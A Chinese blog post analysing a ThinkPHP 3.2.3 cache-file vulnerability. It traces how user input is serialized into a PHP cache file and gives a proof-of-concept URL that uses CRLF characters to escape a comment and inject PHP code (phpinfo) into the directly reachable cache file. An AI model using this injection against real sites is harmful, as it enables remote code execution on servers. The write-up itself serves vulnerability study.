thinkphp3缓存漏洞
2022/3/2 14:16:18
本文主要是介绍thinkphp3缓存漏洞,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
配置控制器Application/Home/Controller/IndexController.class.php
<?php namespace Home\Controller; use Think\Controller; class IndexController extends Controller { public function index(){ $data=I('get.data'); S('data',$data); } }
我们在浏览器访问http://127.0.0.1/thinkphp-3.2.3/?data=spring
发现生成缓存文件Application/Runtime/Temp/8d777f385d3dfec8815d20f7496026dc.php
缓存文件的名称8d777f385d3dfec8815d20f7496026dc
就是S('data',$data);
中data
的MD5
代码分析
打断点进入S()
方法
跟进写缓存部分的代码return $cache->set($name, $value, $expire);
文件名来自filename()
函数,在有源码的情况下这是已知的
$data
来自序列化之后的$value
,$value
可控
$data = serialize($value);
现在的$data
是"s:6:"spring";"
接下来的这段代码是写入文件的关键
$data = "<?php\n//" . sprintf('%012d', $expire) . $check . $data . "\n?>"; $result = file_put_contents($filename, $data);
这里使用了file_put_contents()
函数,另外写入的部分用了//
注释符防止其被解析,但我们可以使用换行符等进行绕过
所以最终我们的POC为http://127.0.0.1/thinkphp-3.2.3/?data=%0d%0aphpinfo();%0d%0a//
0x0d - \r, carrige return 回车
0x0a - \n, new line 换行
Windows 中换行为0d 0a
UNIX 换行为 0a
因为ThinkPHP3的入口文件位于根目录下,和 application 等目录在同一目录下,导致系统很多文件都可以访问,跟日志泄露一样,这里生成的缓存文件也是可以直接访问的
访问http://127.0.0.1/thinkphp-3.2.3/Application/runtime/Temp/8d777f385d3dfec8815d20f7496026dc.php
可见
缓存文件内容为
<?php //000000000000s:16:" phpinfo(); //"; ?>
参考链接
- https://www.freebuf.com/vuls/282906.html
- https://zhuanlan.zhihu.com/p/28554803
END
建了一个微信的安全交流群,欢迎添加我微信备注进群
,一起来聊天吹水哇,以及一个会发布安全相关内容的公众号,欢迎关注
这篇关于thinkphp3缓存漏洞的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-19php8的协程和hyperf的协程有什么区别?-icode9专业技术文章分享
- 2024-12-19php8 的fiber是什么?-icode9专业技术文章分享
- 2024-12-05怎么在php8,1 里面开启 debug?-icode9专业技术文章分享
- 2024-12-05怎么在php8,1 里面开启 debug?-icode9专业技术文章分享
- 2024-11-29使用PHP 将ETH账户的资产汇集到一个账户
- 2024-11-23怎么实现安卓+php 热更新方案?-icode9专业技术文章分享
- 2024-11-22PHP 中怎么实现判断多个值是否为空、null 或者为 false?-icode9专业技术文章分享
- 2024-11-11开源 PHP 商城项目 CRMEB 二次开发和部署教程
- 2024-11-09怎么使用php在kaufland平台刊登商品?-icode9专业技术文章分享
- 2024-11-05PHP的抽象类和接口是什么,有什么区别-icode9专业技术文章分享